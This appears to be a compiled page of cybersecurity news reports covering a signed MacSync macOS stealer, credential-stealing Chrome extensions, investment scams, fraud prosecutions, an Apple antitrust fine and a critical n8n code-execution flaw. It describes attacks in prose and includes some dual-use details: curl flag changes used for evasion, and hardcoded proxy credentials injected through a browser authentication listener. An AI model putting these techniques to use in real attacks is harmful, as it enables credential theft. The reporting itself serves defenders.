2025-12-25 AI创业新闻

New MacSync macOS Stealer Uses Signed App to Bypass Apple Gatekeeper

Cybersecurity researchers have discovered a new variant of a macOS information stealer called MacSync that’s delivered by means of a digitally signed, notarized Swift application masquerading as a messaging app installer to bypass Apple’s Gatekeeper checks. “Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or ClickFix -style techniques, this sample adopts a more deceptive, hands-off approach,” Jamf researcher Thijs Xhaflaire said . The Apple device management firm and security company said the latest version is distributed as a code-signed and notarized Swift application within a disk image (DMG) file named “zk-call-messenger-installer-3.9.2-lts.dmg” that’s hosted on “zkcall[.]net/download.” The fact that it’s signed and notarized means it can be run without being blocked or flagged by built-in security controls like Gatekeeper or XProtect. Despite this, the installer has been found to display instructions prompting users to right-click and open the app – a common tactic used to sidestep such safeguards.

Apple has since revoked the code signing certificate. The Swift-based dropper then performs a series of checks before downloading and executing an encoded script through a helper component. This includes verifying internet connectivity, enforcing a minimum execution interval of around 3600 seconds to enforce a rate limit, and removing quarantine attributes and validating the file prior to execution. “Notably, the curl command used to retrieve the payload shows clear deviations from earlier variants,” Xhaflaire explained.

“Rather than using the commonly seen -fsSL combination, the flags have been split into -fL and -sS, and additional options like –noproxy have been introduced.” “These changes, along with the use of dynamically populated variables, point to a deliberate shift in how the payload is fetched and validated, likely aimed at improving reliability or evading detection.” Another evasion mechanism used in the campaign is the use of an unusually large DMG file, inflating its size to 25.5 MB by embedding unrelated PDF documents. The Base64-encoded payload, once parsed, corresponds to MacSync , a rebranded version of Mac.c that first emerged in April 2025. MacSync, per MacPaw’s Moonlock Lab, comes fitted with a fully-featured Go-based agent that goes beyond simple data theft and enables remote command and control capabilities. It’s worth noting that code-signed versions of malicious DMG files mimicking Google Meet have also been observed in attacks propagating other macOS stealers like Odyssey .

That said, threat actors have continued to rely on unsigned disk images to deliver DigitStealer as recently as last month. “This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly attempt to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications,” Jamf said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

The fraudulent investment scheme known as Nomani has witnessed an increase by 62%, according to data from ESET, as campaigns distributing the threat have also expanded beyond Facebook to include other social media platforms, such as YouTube. The Slovak cybersecurity company said it blocked over 64,000 unique URLs associated with the threat this year. A majority of the detections originated from Czechia, Japan, Slovakia, Spain, and Poland. Nomani was first documented by ESET in December 2024 as leveraging social media malvertising, company-branded posts, and artificial intelligence (AI)-powered video testimonials to deceive users into investing their funds in non-existent investment products that falsely claim significant returns.

When victims request payout of the promised profits, they are asked to pay additional fees or provide additional personal information, such as ID and credit card information. As is typical of investment scams of this kind, the end goal is financial loss. It doesn’t end there, for the fraudsters attempt to scam them again by making use of Europol- and INTERPOL-related lures on social media that promise assistance with getting their stolen funds back – only to lose more money in the process. ESET said the scam has since received some notable upgrades, including making their AI-generated videos more realistic in an effort to make it harder for prospective targets to spot the deception.

“Deepfakes of popular personalities, used as initial hooks for phishing forms or websites, now use higher resolution, have significantly reduced unnatural movements and breathing, and have also improved their A/V sync,” the company noted. The fabricated content has been found to often leverage topical events or personalities who are more widely seen in the public discourse to lend more credibility to the scheme. In one case observed in Czechia, a bogus news article falsely claimed the government was investing through one of its scam cryptocurrency platforms and generating substantial returns. To ensure that their malicious ads are not caught by the platform’s systems, the threat actors make sure that the campaigns are run only for a few hours.

Another important change involves redirecting users to benign cloaking pages instead of external phishing forms in case they don’t meet the targeting criteria. “To further lower their footprint, attackers increasingly abuse legitimate tools offered by the social media ad framework, such as forms and surveys instead of external webpages, to harvest victims’ information,” ESET said. Improvements have also been observed in the templates used to generate phishing pages, with signs pointing to the use of AI tools to write the HTML code. This assessment is based on the presence of checkboxes in source code comments.

Furthermore, GitHub repositories hosting such templates for investment scams have come from Russian and/or Ukrainian users. Despite these changes, the number of detections for Nomani in the second half of 2025 dropped, an indication that the attackers are likely being forced to revamp their tactics in the face of increased law enforcement efforts to combat such scams. “On the bright side, although overall detections are up compared to 2024, there’s a hint of improvement, as H2 2025 detections have declined by 37% compared to H1 2025,” ESET said. The disclosure coincides with a new investigation from Reuters that found 19% of Meta’s $18 billion in ad sales in China last year came from ads for scams, illegal gambling, pornography, and other banned content that are run by the company’s ad agency partners in the country.

Some of these agencies allow businesses to run banned advertisements. Following the report, Meta is said to have put the program under review. The latest report comes on the heels of another Reuters report that revealed the company projected earning 10% of Meta’s global revenue for 2024 – or about $16 billion – from such ads, including those run by threat actors behind Nomani, quantifying the humongous scale of the problem. Found this article interesting?

Attacks are Evolving: 3 Ways to Protect Your Business in 2026

Every year, cybercriminals find new ways to steal money and data from businesses. Breaching a business network, extracting sensitive data, and selling it on the dark web has become a reliable payday. But in 2025, the data breaches that affected small and medium-sized businesses (SMBs) challenged our perceived wisdom about exactly which types of businesses cybercriminals are targeting. This article will outline the learnings from key data breaches in 2025 as well as the most effective ways for SMBs to protect themselves in the coming year.

Examining the 2025 data breaches Prior to 2025, large businesses were popular targets for hackers because of their large pools of resources. It was assumed that smaller businesses simply weren’t as vulnerable to cyberattacks because there was less value in attacking them. But new security research from the Data Breach Observatory shows that’s changing: Small- and medium-sized businesses (SMBs) are now more likely to become a target. This change in tactic has been caused by large businesses investing in their cybersecurity and also refusing to pay ransoms.

Cybercriminals are less likely to extract anything of value by attacking these businesses, so instead they’re turning to attacking smaller businesses. While the payday may be smaller when attacking SMBs, by increasing the volume of attacks, cybercriminals can make up the shortfall. Smaller businesses have fewer resources to protect their networks and thus have become more reliable targets. Four in five small businesses have suffered a recent data breach.

By examining some of these data breaches and the companies they affected, a pattern emerges, and failings can be identified. Here are three key SMB data breaches from 2025: Tracelo — More than 1.4 million records stolen from this American mobile geolocating business appeared on the dark web following an attack from a hacker known as Satanic. Customer names, addresses, phone numbers, email addresses, and passwords were all made available for sale. PhoneMondo — This German telecommunications company was infiltrated by hackers and had more than 10.5+ million records stolen and posted online.

Customer names, dates of birth, addresses, phone numbers, email addresses, usernames, passwords, and IBANs all made it onto the dark work. SkilloVilla — The 60-person team behind this Indian edtech platform wasn’t able to protect the extensive customer data collected by the platform, and more than 33 million records were leaked on the dark web. Customer names, addresses, phone numbers, and email addresses have all been spotted online. What can we learn?

Looking at these particular breaches and taking into account the wider data breach landscape, we can identify trends that shaped 2025: SMBs were the number one target for hackers in 2025, accounting for 70.5% of the data breaches identified in the Data Breach Observatory . This means that companies between 1 and 249 employees were the most vulnerable to cybersecurity breaches throughout the year. Retail, tech, and media/entertainment businesses were targeted most frequently. Names and contact information are the most common records to appear on the dark web, increasing the risk of phishing attacks targeting workers.

Names and emails appeared in 9 out of 10 data breaches. With these trends in mind, it’s likely that hackers will continue targeting SMBs in the new year. If your organization falls into this category, your risk of a data breach could be higher. It’s not inevitable, however.

By considering your business’s sensitive data, how it’s stored, and what you use to protect it, you can secure your organization. How to avoid data breaches in 2026 Avoiding a data breach doesn’t have to be costly or complicated, as long as your business takes the right approach and finds the right tools. Employ two-factor authentication If all it takes to gain access to one of your business tools is a username and a password, your network is significantly easier to breach. Two-factor authentication (2FA) makes it harder for unauthorized individuals to gain access.

By introducing a secondary authentication method, such as an OTP code, security key, or biometric login, authentication and authorization take less time for your system, as well as increasing the barrier to entry. Secure access control to your network The principle of least privilege is a method used to decide who has access to what business tools and data. It dictates that any given team member should have access to strictly the necessary information they need to perform their role and nothing else. This approach to access control protects your organization by reducing the number of entry points into your network.

When access has been granted to strictly necessary team members, that access needs to be secured with good password hygiene. This includes creating strong passwords, not reusing passwords for multiple accounts, and ensuring that your business is notified if any of your data appears on the dark web. Strong and enforceable password policies support good password hygiene, and you can ensure that the dark web is regularly scanned for business data with a tool or service such as a password manager. Store sensitive data securely Leaked passwords and email addresses contribute to the risk that your employees will be targeted by phishing attacks or have their accounts compromised.

Even a single compromised account can lead to a data breach. Create a single, secure repository for every business credential by adopting a secure business password manager . With a password manager, every team member can safely generate strong passwords that meet your business’s password policy, autofill them on frequently visited websites and apps, and securely share credentials when needed. This secures all of these vital entry points into your business network.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

SEC Files Charges Over $14 Million Crypto Scam Using Fake AI-Themed Investment Tips

The U.S. Securities and Exchange Commission (SEC) has filed charges against multiple companies for their alleged involvement in an elaborate cryptocurrency scam that swindled more than $14 million from retail investors. The complaint charged crypto asset trading platforms Morocoin Tech Corp., Berge Blockchain Technology Co., Ltd., and Cirkor Inc., as well as investment clubs AI Wealth Inc., Lane Wealth Inc., AI Investment Education Foundation (AIIEF) Ltd., and Zenith Asset Tech Foundation, in connection with the operation. The SEC said the scam unfolded as a multi-step fraud that enticed unsuspecting users with ads on social media and built trust with them through group chats in which the scammers posed as financial professionals and promised returns from artificial intelligence (AI)-generated investment tips.

The fraudsters then convinced the victims to invest their funds into fake cryptocurrency asset trading platforms, only to defraud them later. According to the SEC, AI Wealth, Lane Wealth, AIIEF, and Zenith operated investment clubs on messaging apps like WhatsApp to which retail investors were lured into joining via ads on social media. While AI Wealth and Lane Wealth operated their WhatsApp groups from at least January 2024 to June 2024, AIIEF and Zenith ran from at least July 2024 to January 2025. The complaint alleges an unnamed individual based in Beijing, China, paid for the registrations of AI Wealth, Lane Wealth, and Zenith.

The details of the cryptocurrency platforms are as follows - Morocoin Tech Corp. - Established around December 2023 and accessible at h5.morocoin[.]top (Currently delinquent) Berge Blockchain Technology Co., Ltd. - Established around June 2022 and accessible at www.bergev[.]org (Currently delinquent) Cirkor Inc. - Established around May 2024 and accessible at www.cirkortrading[.]com (Administratively dissolved in October 2025) Each of these clubs included a “professor” who sent updates to investors via WhatsApp on macroeconomic conditions or commentary on stocks and an “assistant” who handled day-to-day interactions with participants.

These personas also send trade recommendations that they falsely claimed were based on AI-generated “signals.” “The clubs gained investors’ confidence with supposedly AI-generated investment tips before luring investors to open and fund accounts on purported crypto asset trading platforms Morocoin, Berge, and Cirkor, which falsely claimed to have government licenses, as alleged,” the SEC said. “The investment clubs and platforms then allegedly offered ‘Security Token Offerings’ that were purportedly issued by legitimate businesses. In reality, no trading took place on the trading platforms, which were fake, and the Security Token Offerings and their purported issuing companies did not exist.” The AI Wealth and Lane Wealth WhatsApp groups are said to have promoted an STO of a cryptocurrency asset called SCT, purportedly issued by the company SatCommTech. Likewise, the AIIEF and Zenith WhatsApp groups advertised an STO of another crypto asset called HMB that was issued by HumanBlock.

Both SatCommTech and HumanBlock have been identified as fictitious. To make matters worse, when investors attempted to withdraw their funds, the bogus platforms defrauded them a second time by demanding that they pay advance fees to gain access to money in their accounts. In the end, the platforms cut off investors’ access to their services. The ill-gotten proceeds, totaling at least $14 million, were moved overseas through a web of bank accounts and crypto asset wallets, in some cases through accounts held by Chinese or Burmese individuals located in Southeast Asia.

Of the total misappropriated funds, cryptocurrency assets account for at least $7.4 million, and fiat currency accounts for $6.6 million. In one case, a Morocoin investor made seven separate wires amounting to more than $1 million to accounts in China and Hong Kong. In another, a Cirkor investor wired over $1.4 million to a bank in Indonesia. There have also been multiple reports on Reddit about individuals losing their money to the scam , with the AIIEF using names like “Richard Dill” and “Daisy Akemi” for professors and assistants.

The defendants have been charged with violating the anti-fraud provisions of the Securities Act of 1933 and the Securities Exchange Act of 1934. In addition, the SEC is seeking permanent injunctions and civil penalties, along with the repayment of the money with prejudgment interest. “This matter highlights an all-too-common form of investment scam that is being used to target U.S. retail investors with devastating consequences,” said Laura D’Allaird, Chief of the Cyber and Emerging Technologies Unit.

“Fraud is fraud, and we will vigorously pursue securities fraud that harms retail investors.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Italy Fines Apple €98.6 Million Over ATT Rules Limiting App Store Competition

Apple has been fined €98.6 million ($116 million) by Italy’s antitrust authority after finding that the company’s App Tracking Transparency (ATT) privacy framework restricted App Store competition. The Italian Competition Authority (Autorità Garante della Concorrenza e del Mercato, or AGCM) said the company’s “absolute dominant position” in app distribution allowed it to “unilaterally impose” the ATT rules on third-party app developers, without consulting with them beforehand. The investigation was launched in May 2023. The AGCM said it’s not calling into question Apple’s decision to adopt safeguards designed to enhance users’ privacy on iOS, but rather it’s taking issue with the consent requirements that are excessively burdensome for developers and “disproportionate” to the stated objectives of ATT.

Specifically, this requires developers to serve both ATT- and GDPR-related permission prompts in apps for iPhone and iPad users in the E.U. to seek user permission before processing their data for personalized ads. In contrast, Apple’s own apps and services can obtain this permission in a single tap. “In particular, third-party app developers are required to obtain specific consent for the collection and linking of data for advertising purposes through Apple’s ATT prompt,” AGCM said.

“However, such a prompt does not meet privacy legislation requirements, forcing developers to double the consent request for the same purpose.” The authority also said the double consent requirement that arises as a result of ATT harms third-party developers who rely on advertising, adding, “Apple should have ensured the same level of privacy protection for users by allowing developers to obtain consent to profiling in a single ‘Personalized Advertising’ prompt. In a statement shared with Reuters, Apple said it will appeal the regulator’s decision and reiterated its commitment “to defend strong privacy protections.” It also said the rules apply equally to all developers, including Apple. Apple introduced ATT in 2021 as a way for mobile apps to seek users’ explicit consent in order to access their device’s unique advertising identifier for tracking them across apps and websites for targeted advertising. This is not the first time the privacy framework has run at odds with competition authorities.

Back in March 2025, the company was also fined €150 million ($162 million) by France’s competition watchdog for using ATT to leverage its dominant market position in mobile app advertising. Apple is also facing similar probes in Poland and Romania . Earlier this month, Germany’s antitrust authority said it was testing Apple’s proposed changes to ATT, which included changes to the text and formatting of the consent prompt while maintaining “core user benefits.” The company is said to have agreed to introduce neutral consent prompts for both its own services and third-party apps, in addition to simplifying the consent process so that developers can obtain user permission in a manner that complies with data protection law. Found this article interesting?

How AI and Zero Trust Work Together to Catch Attacks With No Files or Indicators

JavaScript must be enabled in order to register for webinar. Yes, I’d like to register for the webinar and agree to the handling of my information as explained in thePrivacy Policy. There’s one constant in cybersecurity: the threat landscape continues to rapidly evolve. To bolster their organizations’ resilience, defenders need proactive visibility and tooling across their endpoints, developer environments, and crypto stack to stay several steps ahead of attackers.In this webinar, join experts from the Zscaler Internet Access product team as they cover the next major security challenges and how enterprises can best respond to them:“Living off the Land” Attacks:Today’s attackers use a combination of malware and legitimate system tools like PowerShell, WMI, or RDP.

File-based detection alone misses threats that blend in with trusted processes. Learn how and why gaining endpoint visibility into file-based threats, apps, and process behaviors is essential.Fileless “Last Mile” Reassembly Attacks:Legacy security tools are ineffective against fileless attacks, including those using only obfuscated HTML and JavaScript. Learn how a cloud-native antimalware engine that emulates malicious scripting and reassembles an executable binary in isolation can stop malicious files from being delivered to an endpoint.Securing Developer Environments:Developers are building and deploying applications faster than ever before. But third-party repositories and other open-source CI/CD tools can contain malicious code and vulnerabilities that can compromise your organization’s security.

Inspecting encrypted traffic in developer environments can identify and defeat would-be threats. Learn how to secure development workflows with automated TLS/SSL inspection and code sandboxing.You’ll see howZscaler Internet Access’s capabilities, built on a foundation of zero trust and AI-powered protection, provide SOC and IT teams with the preventative tooling and visibility necessary to effectively defend against emerging threats so you can proactively fortify your security posture to protect your users, devices, and data. There’s one constant in cybersecurity: the threat landscape continues to rapidly evolve. To bolster their organizations’ resilience, defenders need proactive visibility and tooling across their endpoints, developer environments, and crypto stack to stay several steps ahead of attackers.

In this webinar, join experts from the Zscaler Internet Access product team as they cover the next major security challenges and how enterprises can best respond to them: You’ll see howZscaler Internet Access’s capabilities, built on a foundation of zero trust and AI-powered protection, provide SOC and IT teams with the preventative tooling and visibility necessary to effectively defend against emerging threats so you can proactively fortify your security posture to protect your users, devices, and data. By clicking “Register Now,” you agree to permit The Hacker News and its partners to process your contact details, which may include The Hacker News reaching out to you and sharing your contact information with its webinar partners.

Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites

Cybersecurity researchers have discovered two malicious Google Chrome extensions with the same name and published by the same developer that come with capabilities to intercept traffic and capture user credentials. The extensions are advertised as a “multi-location network speed test plug-in” for developers and foreign trade personnel. Both the browser add-ons are available for download as of writing. The details of the extensions are as follows - Phantom Shuttle (ID: fbfldogmkadejddihifklefknmikncaj) - 2,000 users (Published on November 26, 2017) Phantom Shuttle (ID: ocpcmfmiidofonkbodpdhgddhlcmcofd) - 180 users (Published on April 27, 2023) “Users pay subscriptions ranging from ¥9.9 to ¥95.9 CNY ($1.40 to $13.50 USD), believing they’re purchasing a legitimate VPN service, but both variants perform identical malicious operations,” Socket security researcher Kush Pandya said.

“Behind the subscription facade, the extensions execute complete traffic interception through authentication credential injection, operate as man-in-the-middle proxies, and continuously exfiltrate user data to the threat actor’s C2 [command-and-control] server.” Once unsuspecting users make the payment, they receive VIP status and the extensions auto-enable “smarty” proxy mode, which routes traffic from over 170 targeted domains through the C2 infrastructure. The extensions work as advertised to reinforce the illusion of a functional product. They perform actual latency tests on proxy servers and display connection status, while keeping users in the dark about their main goal, which is to intercept network traffic and steal credentials. This involves malicious modifications prepended to two JavaScript libraries, namely, jquery-1.12.2.min.js and scripts.js, that come bundled with the extensions.

The code is designed to automatically inject hard-coded proxy credentials (topfany / 963852wei) into every HTTP authentication challenge across all websites by registering a listener on chrome.webRequest.onAuthRequired. “When any website or service requests HTTP authentication (Basic Auth, Digest Auth, or proxy authentication), this listener fires before the browser displays a credential prompt,” Pandya explained. “It immediately responds with the hardcoded proxy credentials, completely transparent to the user. The asyncBlocking mode ensures synchronous credential injection, preventing any user interaction.” Once users authenticate to a proxy server, the extension configures Chrome’s proxy settings using a Proxy Auto-Configuration ( PAC ) script to implement three modes - close, which disables the proxy feature always, which routes all web traffic through the proxy smarty, which routes a hard-coded list of more than 170 high-value domains through the proxy The list of domains includes developer platforms (GitHub, Stack Overflow, Docker), cloud services (Amazon Web Services, Digital Ocean, Microsoft Azure), enterprise solutions (Cisco, IBM, VMware), social media (Facebook, Instagram, Twitter), and adult content sites.

The inclusion of pornographic sites is likely an attempt to blackmail victims, Socket theorized. The net result of this behavior is that user web traffic is routed through threat actor-controlled proxies while the extension maintains a 60-second heartbeat to its C2 server at phantomshuttle[.]space, a domain that remains operational. It also grants the attacker a “man-in-the-middle” (MitM) position to capture traffic, manipulate responses, and inject arbitrary payloads. More importantly, the heartbeat message transmits a VIP user’s email, password in plaintext, and version number to an external server via an HTTP GET request every five minutes for continuous credential exfiltration and session monitoring.

“The combination of heartbeat exfiltration (credentials and metadata) plus proxy MitM (real-time traffic capture) provides comprehensive data theft capabilities operating continuously while the extension remains active,” Socket said. Put differently, the extension captures passwords, credit card numbers, authentication cookies, browsing history, form data, API keys, and access tokens from users accessing the targeted domains while VIP mode is active. What’s more, the theft of developer secrets could pave the way for supply chain attacks. It’s currently not known who is behind the eight-year-old operation, but the use of Chinese language in the extension description, the presence of Alipay/WeChat Pay integration to make payments, and the use of Alibaba Cloud to host the C2 domain points to a China-based operation.

“The subscription model creates victim retention while generating revenue, and the professional infrastructure with payment integration presents a facade of legitimacy,” Socket said. “Users believe they’re purchasing a VPN service while unknowingly enabling complete traffic compromise.” The findings highlight how browser-based extensions are becoming an unmanaged risk layer for enterprises. Users who have installed the extensions are advised to remove them as soon as possible. For security teams, it’s essential to deploy extension allowlisting, monitor for extensions with subscription payment systems combined with proxy permissions, and implement network monitoring for suspicious proxy authentication attempts.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

INTERPOL Arrests 574 in Africa; Ukrainian Ransomware Affiliate Pleads Guilty

A law enforcement operation coordinated by INTERPOL has led to the recovery of $3 million and the arrest of 574 suspects by authorities from 19 countries, amidst a continued crackdown on cybercrime networks in Africa. The coordinated effort, named Operation Sentinel, took place between October 27 and November 27, 2025, and mainly focused on business email compromise (BEC), digital extortion, and ransomware on the continent. Participating nations included Benin, Botswana, Burkina Faso, Cameroon, Chad, Congo, Djibouti, Democratic Republic of the Congo, Gabon, Ghana, Kenya, Malawi, Nigeria, Senegal, South Africa, South Sudan, Uganda, Zambia, and Zimbabwe. Over the course of the initiative, more than 6,000 malicious links were taken down and six distinct ransomware variants were decrypted.

The names of the ransomware families were not disclosed. The investigated incidents were linked to estimated financial losses exceeding $21 million, INTERPOL added. Multiple suspects have been arrested in connection with a ransomware attack targeting an unnamed Ghanaian financial institution that encrypted 100 terabytes of data and stole about $120,000. In addition, Ghanaian authorities took down a cyber fraud network operating across Ghana and Nigeria that defrauded more than 200 victims of over $400,000 using well-designed websites and mobile apps, which impersonated popular fast-food brands to collect payments for fake orders.

As part of the effort, 10 individuals were apprehended, 100 digital devices were seized, and 30 fraudulent servers were taken offline. Law enforcement from Benin also dismantled 43 malicious domains and 4,318 social media accounts that were used to further extortion schemes and scams. The operation culminated in the arrest of 106 people. “The scale and sophistication of cyber attacks across Africa are accelerating, especially against critical sectors like finance and energy,” Neal Jetton, INTERPOL’s director of cybercrime, said.

Operation Sentinel is part of the African Joint Operation against Cybercrime ( AFJOC ), which aims to enhance the capabilities of national law enforcement agencies in Africa and better disrupt cybercriminal activity in the region. Ukrainian National Pleads Guilty to Nefilim Ransomware Attacks The disclosure comes as a 35-year-old from Ukraine pleaded guilty in the U.S. to using Nefilim ransomware to attack companies in the country and elsewhere in his capacity as an affiliate. Artem Aleksandrovych Stryzhak was arrested in Spain in June 2024 and extradited to the U.S.

earlier this April. In September, the Justice Department (DoJ) charged another Ukrainian national, Volodymyr Viktorovich Tymoshchuk, for his role as the administrator of the LockerGoga, MegaCortex, and Nefilim ransomware operations between December 2018 and October 2021. Tymoshchuk remains at large, although authorities have announced a $11 million reward for information leading to his arrest or conviction. Tymoshchuk is also on the most wanted lists of both the U.S.

Federal Bureau of Investigation ( FBI ) and the European Union ( E.U. ). Nefilim’s victims span the U.S., Germany, the Netherlands, Norway, and Switzerland. “In June 2021, Nefilim administrators gave Stryzhak access to the Nefilim ransomware code in exchange for 20 percent of his ransom proceeds,” the DoJ said.

“Stryzhak and others researched potential victims after gaining unauthorized access to their networks, including by using online databases to obtain information about the companies’ net worth, size, and contact information.” Around July 2021, a Nefilim administrator is said to have encouraged Stryzhak to target companies in the U.S., Canada, and Australia with more than $200 million dollars in annual revenue. Nefilim operated under a double extortion model, pressurizing victims to pay up or risk getting their stolen data published on a publicly accessible data leaks site known as Corporate Leaks that was maintained by the administrators. Stryzhak pleaded guilty to conspiracy to commit fraud related to computers in connection with his Nefilim ransomware activities. He is scheduled to be sentenced on May 6, 2026.

If found guilty, he faces a maximum penalty of 10 years in prison. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Passwd: A walkthrough of the Google Workspace Password Manager

Passwd is designed specifically for organizations operating within Google Workspace. Rather than competing as a general consumer password manager, its purpose is narrow, and business-focused: secure credential storage, controlled sharing, and seamless Workspace integration. The platform emphasizes practicality over feature overload, aiming to provide a reliable system for teams that already rely on Google’s tools. Security as the starting point Encryption and data protection are the basic building blocks of Passwd.

Every credential, file, or sensitive asset gets encrypted with AES-256, an extremely secure encryption standard that is widely recognized. Encryption happens before storage, keeping data protected throughout its lifecycle. Passwd is based on a zero-knowledge architecture; only the users, not Passwd, are able to access decrypted data. It does not have any visibility of the stored passwords or secrets.

The structure reflects an enterprise mindset: Centralized admin control Granular, role-based permissions Visibility into credential access and changes Clear organizational hierarchy Security assurance is further supported by SOC 2 and GDPR readiness , through documentation and controls for businesses that need to adhere to regulated compliance standards. Along with encryption and zero-knowledge design, these certifications reinforce the security posture of the platform. Audit logs and access tracking provide visibility into who has viewed, shared, or changed credentials in the system. This is helpful in a number of ways when it comes to compliance, internal audits, and security reviews.

From a reliability perspective, Passwd has minimal downtime. Though Google updates caused disruptions, they have only been short-lived. There have not been any data breaches to date. Integration designed for Google Workspace Where most password managers extend across multiple ecosystems, Passwd stays firmly within Google’s.

The platform connects directly to Google Workspace for identity management, making onboarding and administration easier. Because authentication is done via Google OAuth, users sign in with their existing Google accounts, with no new master passwords, credentials, or login systems to maintain. This reduces credential sprawl and eliminates separate password databases. For teams used to Gmail, Drive, Docs, or Google Admin Console, the setup feels intuitively familiar.

Deployments take mere minutes rather than requiring IT restructuring. This focus also creates clarity about the intended environment in which Passwd will operate: Passwd works only inside the Google Workspace ecosystem and cannot be used with external identity providers. Passwd includes Google SSO support, allowing for a passwordless login experience. The service also provides audit logging, which gives administrators insight into who has accessed credentials and when.

Reports indicate it scales effectively for several hundred employees, and its pricing model eliminates additional fees once a company has more than 301 users, making it appealing to larger teams. How teams use Passwd Day-to-Day When activated, Passwd turns into a shared storage system in which groups can securely organize: Passwords and logins SSH keys API credentials Database access Payment information Internal tools or system accounts Sharing can be temporary or permanent, by individuals or groups. Permissions control a user’s level of access to a record: whether they can view it, edit it, or manage it. Activity tracking enables a team to understand how its credentials are being accessed and by whom.

Role-based access, sharing links, and detailed audit trails support common workplace scenarios, new employee onboarding, transitions between departments, or restricted administrative access. Passwd’s Premium plans include unlimited records and users, designed to scale with an organization as it grows. The plan tier determines the features available, allowing businesses to adopt the level that fits their workflows. Cross-platform access and usage Passwd provides wide device compatibility with a lightweight footprint: Web access through any browser Chrome, Edge, and Firefox extensions Android and iOS mobile apps Browser extensions help autofill records and credential capture without requiring large desktop applications.

This cross-platform consistency allows users to transition easily from device to device without changing how they interact with stored data. Built-in tools and functionality Passwd contains the essential password-management utilities: A password generator able to create secure, random passwords Auditing tools for credentials that are weak, reused, or outdated Tags that give organization to records The interface is free of complicated add-ons, favoring a clean, straightforward layout: search, filtering, and record editing are easily located and used. Pricing structure and value The pricing of Passwd is designed for organizational usage, rather than individual licensing. The Workspace plan starts from $19 per month , including unlimited stored records.

A per-user pricing option is available for smaller teams or departments that aren’t using Workspace organization-wide, though the pay-per-workspace model may offer better overall efficiency. A free Starter Plan allows unlimited users and up to 15 stored records, so it is highly accessible for small teams or early testing. The Enterprise plan is ideal for organizations that require GDPR and SOC2 compliance, alongside advanced user monitoring. Its most exceptional benefit is that it lets you host the password manager inside your very own Google Cloud project, an uncommon capability and an important added value in comparison to other team password managers.

This puts Passwd in the position of being an entry-level enterprise product, but without the need for enterprise-level pricing. Customer feedback and observed reception Passwd maintains a 4.7-star rating across the third-party review platforms, including Trustpilot and G2. Feedback often points out that: Smooth integration with Google Workspace Fast onboarding through Google Identity Easier credential sharing across teams Clear access governance using Google Groups Smaller teams often mention that the free tier provides enough functionality for centralized storage and secure sharing, while larger organizations use Passwd for its onboarding and role transitions. Where Passwd fits and where it doesn’t Based on its structure and feature set, Passwd aligns most naturally with organizations that: Already use Google Workspace company-wide Prefer a unified identity and authentication system Share passwords or credentials across teams Want admin visibility, compliance support, and access logs Need a scalable approach without paying per-seat licensing However, Passwd is less applicable for organizations that: Require integrations beyond Google’s ecosystem Use multiple or diverse identity providers Operate outside Google Workspace environments Its design intentionally prioritizes Workspace compatibility over platform versatility.

Overview of closing walkthrough A walkthrough of Passwd shows a password manager featuring predictability, efficiency, and organizational alignment rather than feature saturation. Its role is clear: provide strong encryption, controlled collaboration, compliance-ready visibility, and seamless Google authentication. For teams already living inside Google Workspace, Passwd becomes an extension of the workflows that are already in place, not another tool to manage, and handles shared credentials, enforces access governance, and protects sensitive information in a safe, structured manner. Found this article interesting?

This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

U.S. DoJ Seizes Fraud Domain Behind $14.6 Million Bank Account Takeover Scheme

The U.S. Justice Department (DoJ) on Monday announced the seizure of a web domain and database that it said was used to further a criminal scheme designed to target and defraud Americans by means of a bank account takeover scheme. The domain in question, web3adspanels[.]org, was used as a backend web panel to host and manipulate illegally harvested bank login credentials. Users to the website are now greeted by a seizure banner that says the domain was taken down in an international law enforcement operation led by authorities from the U.S.

and Estonia. “The criminal group perpetrating the bank account takeover fraud delivered fraudulent advertisements through search engines, including Google and Bing,” the DoJ said . “These fraudulent advertisements imitate the sponsored search engine advertisements used by legitimate banking entities.” The ads served as a conduit to redirect unsuspecting users to fake bank websites operated by the threat actors, who harvested login credentials entered by victims through an unspecified malicious software program built into the sites. The stolen credentials were then used by the criminals to sign into legitimate bank websites to take over victims’ accounts and drain their funds.

The scheme is estimated to have claimed 19 victims across the U.S. to date, including two companies in the Northern District of Georgia, leading to attempted losses of approximately $28 million and actual losses of approximately $14.6 million. The DoJ said the confiscated domain stored the stolen login credentials of thousands of victims, in addition to hosting a backend server to facilitate takeover fraud as recently as last month. According to information shared by the U.S.

Federal Bureau of Investigation (FBI), the Internet Crime Complaint Center (IC3) has received more than 5,100 complaints related to bank account takeover fraud since January 2025, with reported losses upwards of $262 million. Users are advised to exercise caution when sharing about themselves online or on social media; regularly monitor accounts for any financial irregularities; use unique, complex passwords; ensure the correctness of banking website URLs before signing in; and stay vigilant against phishing attacks or suspicious callers. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Critical n8n Flaw (CVSS 9.9) Enables Arbitrary Code Execution Across Thousands of Instances

A critical security vulnerability has been disclosed in the n8n workflow automation platform that, if successfully exploited, could result in arbitrary code execution under certain circumstances. The vulnerability, tracked as CVE-2025-68613 , carries a CVSS score of 9.9 out of a maximum of 10.0. Security researcher Fatih Çelik has been credited with discovering and reporting the flaw. The package has about 57,000 weekly downloads, according to statistics on npm.

“Under certain conditions, expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficiently isolated from the underlying runtime,” the maintainers of the npm package said . “An authenticated attacker could abuse this behavior to execute arbitrary code with the privileges of the n8n process. Successful exploitation may lead to full compromise of the affected instance, including unauthorized access to sensitive data, modification of workflows, and execution of system-level operations.” The issue, which affects all versions including and higher than 0.211.0 and below 1.120.4, has been patched in 1.120.4, 1.121.1, and 1.122.0. Per the attack surface management platform Censys, there are 103,476 potentially vulnerable instances as of December 22, 2025.

